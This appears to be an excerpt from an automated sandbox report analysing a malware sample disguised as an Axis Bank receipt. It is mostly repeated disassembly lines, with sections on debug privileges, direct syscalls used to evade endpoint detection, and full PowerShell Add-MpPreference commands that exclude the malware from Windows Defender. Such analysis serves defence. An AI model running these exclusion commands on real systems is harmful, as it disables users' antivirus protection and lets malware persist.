Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 mov eax, dword ptr fs:[00000030h] 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0E9E0 mov eax, dword ptr fs:[00000030h] 10_2_01B0E9E0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB29F9 mov eax, dword ptr fs:[00000030h] 10_2_01AB29F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB29F9 mov eax, dword ptr fs:[00000030h] 10_2_01AB29F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4A9D3 mov eax, dword ptr fs:[00000030h] 10_2_01B4A9D3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B169C0 mov eax, dword ptr fs:[00000030h] 10_2_01B169C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A9D0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A9D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A9D0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A9D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A9D0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A9D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A9D0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A9D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A9D0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A9D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A9D0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A9D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB49D0 mov eax, dword ptr fs:[00000030h] 10_2_01AB49D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0892A mov eax, dword ptr fs:[00000030h] 10_2_01B0892A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B1892B mov eax, dword ptr fs:[00000030h] 10_2_01B1892B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0C912 mov eax, dword ptr fs:[00000030h] 10_2_01B0C912
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE908 mov eax, dword ptr fs:[00000030h] 10_2_01AFE908
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE908 mov eax, dword ptr fs:[00000030h] 10_2_01AFE908
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78918 mov eax, dword ptr fs:[00000030h] 10_2_01A78918
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78918 mov eax, dword ptr fs:[00000030h] 10_2_01A78918
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC096E mov eax, dword ptr fs:[00000030h] 10_2_01AC096E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC096E mov edx, dword ptr fs:[00000030h] 10_2_01AC096E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC096E mov eax, dword ptr fs:[00000030h] 10_2_01AC096E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA6962 mov eax, dword ptr fs:[00000030h] 10_2_01AA6962
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA6962 mov eax, dword ptr fs:[00000030h] 10_2_01AA6962
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA6962 mov eax, dword ptr fs:[00000030h] 10_2_01AA6962
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B24978 mov eax, dword ptr fs:[00000030h] 10_2_01B24978
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B24978 mov eax, dword ptr fs:[00000030h] 10_2_01B24978
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0C97C mov eax, dword ptr fs:[00000030h] 10_2_01B0C97C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B54940 mov eax, dword ptr fs:[00000030h] 10_2_01B54940
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B00946 mov eax, dword ptr fs:[00000030h] 10_2_01B00946
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0C89D mov eax, dword ptr fs:[00000030h] 10_2_01B0C89D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80887 mov eax, dword ptr fs:[00000030h] 10_2_01A80887
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4A8E4 mov eax, dword ptr fs:[00000030h] 10_2_01B4A8E4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABC8F9 mov eax, dword ptr fs:[00000030h] 10_2_01ABC8F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABC8F9 mov eax, dword ptr fs:[00000030h] 10_2_01ABC8F9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE8C0 mov eax, dword ptr fs:[00000030h] 10_2_01AAE8C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B508C0 mov eax, dword ptr fs:[00000030h] 10_2_01B508C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2483A mov eax, dword ptr fs:[00000030h] 10_2_01B2483A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2483A mov eax, dword ptr fs:[00000030h] 10_2_01B2483A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABA830 mov eax, dword ptr fs:[00000030h] 10_2_01ABA830
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2835 mov eax, dword ptr fs:[00000030h] 10_2_01AA2835
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2835 mov eax, dword ptr fs:[00000030h] 10_2_01AA2835
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2835 mov eax, dword ptr fs:[00000030h] 10_2_01AA2835
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2835 mov ecx, dword ptr fs:[00000030h] 10_2_01AA2835
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2835 mov eax, dword ptr fs:[00000030h] 10_2_01AA2835
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2835 mov eax, dword ptr fs:[00000030h] 10_2_01AA2835
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0C810 mov eax, dword ptr fs:[00000030h] 10_2_01B0C810
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16870 mov eax, dword ptr fs:[00000030h] 10_2_01B16870
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16870 mov eax, dword ptr fs:[00000030h] 10_2_01B16870
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0E872 mov eax, dword ptr fs:[00000030h] 10_2_01B0E872
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0E872 mov eax, dword ptr fs:[00000030h] 10_2_01B0E872
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A92840 mov ecx, dword ptr fs:[00000030h] 10_2_01A92840
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A84859 mov eax, dword ptr fs:[00000030h] 10_2_01A84859
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A84859 mov eax, dword ptr fs:[00000030h] 10_2_01A84859
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB0854 mov eax, dword ptr fs:[00000030h] 10_2_01AB0854
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34BB0 mov eax, dword ptr fs:[00000030h] 10_2_01B34BB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34BB0 mov eax, dword ptr fs:[00000030h] 10_2_01B34BB0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A90BBE mov eax, dword ptr fs:[00000030h] 10_2_01A90BBE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A90BBE mov eax, dword ptr fs:[00000030h] 10_2_01A90BBE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0CBF0 mov eax, dword ptr fs:[00000030h] 10_2_01B0CBF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAEBFC mov eax, dword ptr fs:[00000030h] 10_2_01AAEBFC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88BF0 mov eax, dword ptr fs:[00000030h] 10_2_01A88BF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88BF0 mov eax, dword ptr fs:[00000030h] 10_2_01A88BF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88BF0 mov eax, dword ptr fs:[00000030h] 10_2_01A88BF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA0BCB mov eax, dword ptr fs:[00000030h] 10_2_01AA0BCB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA0BCB mov eax, dword ptr fs:[00000030h] 10_2_01AA0BCB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA0BCB mov eax, dword ptr fs:[00000030h] 10_2_01AA0BCB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2EBD0 mov eax, dword ptr fs:[00000030h] 10_2_01B2EBD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80BCD mov eax, dword ptr fs:[00000030h] 10_2_01A80BCD
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80BCD mov eax, dword ptr fs:[00000030h] 10_2_01A80BCD
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80BCD mov eax, dword ptr fs:[00000030h] 10_2_01A80BCD
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAEB20 mov eax, dword ptr fs:[00000030h] 10_2_01AAEB20
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAEB20 mov eax, dword ptr fs:[00000030h] 10_2_01AAEB20
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B48B28 mov eax, dword ptr fs:[00000030h] 10_2_01B48B28
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B48B28 mov eax, dword ptr fs:[00000030h] 10_2_01B48B28
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFEB1D mov eax, dword ptr fs:[00000030h] 10_2_01AFEB1D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B54B00 mov eax, dword ptr fs:[00000030h] 10_2_01B54B00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7CB7E mov eax, dword ptr fs:[00000030h] 10_2_01A7CB7E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2EB50 mov eax, dword ptr fs:[00000030h] 10_2_01B2EB50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B28B42 mov eax, dword ptr fs:[00000030h] 10_2_01B28B42
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16B40 mov eax, dword ptr fs:[00000030h] 10_2_01B16B40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16B40 mov eax, dword ptr fs:[00000030h] 10_2_01B16B40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4AB40 mov eax, dword ptr fs:[00000030h] 10_2_01B4AB40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78B50 mov eax, dword ptr fs:[00000030h] 10_2_01A78B50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34B4B mov eax, dword ptr fs:[00000030h] 10_2_01B34B4B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34B4B mov eax, dword ptr fs:[00000030h] 10_2_01B34B4B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88AA0 mov eax, dword ptr fs:[00000030h] 10_2_01A88AA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88AA0 mov eax, dword ptr fs:[00000030h] 10_2_01A88AA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6AA4 mov eax, dword ptr fs:[00000030h] 10_2_01AD6AA4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B54A80 mov eax, dword ptr fs:[00000030h] 10_2_01B54A80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB8A90 mov edx, dword ptr fs:[00000030h] 10_2_01AB8A90
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABAAEE mov eax, dword ptr fs:[00000030h] 10_2_01ABAAEE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABAAEE mov eax, dword ptr fs:[00000030h] 10_2_01ABAAEE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6ACC mov eax, dword ptr fs:[00000030h] 10_2_01AD6ACC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6ACC mov eax, dword ptr fs:[00000030h] 10_2_01AD6ACC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6ACC mov eax, dword ptr fs:[00000030h] 10_2_01AD6ACC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80AD0 mov eax, dword ptr fs:[00000030h] 10_2_01A80AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB4AD0 mov eax, dword ptr fs:[00000030h] 10_2_01AB4AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB4AD0 mov eax, dword ptr fs:[00000030h] 10_2_01AB4AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAEA2E mov eax, dword ptr fs:[00000030h] 10_2_01AAEA2E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA24 mov eax, dword ptr fs:[00000030h] 10_2_01ABCA24
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA38 mov eax, dword ptr fs:[00000030h] 10_2_01ABCA38
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA4A35 mov eax, dword ptr fs:[00000030h] 10_2_01AA4A35
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA4A35 mov eax, dword ptr fs:[00000030h] 10_2_01AA4A35
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0CA11 mov eax, dword ptr fs:[00000030h] 10_2_01B0CA11
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA6F mov eax, dword ptr fs:[00000030h] 10_2_01ABCA6F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA6F mov eax, dword ptr fs:[00000030h] 10_2_01ABCA6F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA6F mov eax, dword ptr fs:[00000030h] 10_2_01ABCA6F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2EA60 mov eax, dword ptr fs:[00000030h] 10_2_01B2EA60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFCA72 mov eax, dword ptr fs:[00000030h] 10_2_01AFCA72
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFCA72 mov eax, dword ptr fs:[00000030h] 10_2_01AFCA72
Enables debug privileges
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtNotifyChangeKey: Direct from: 0x77383C2C
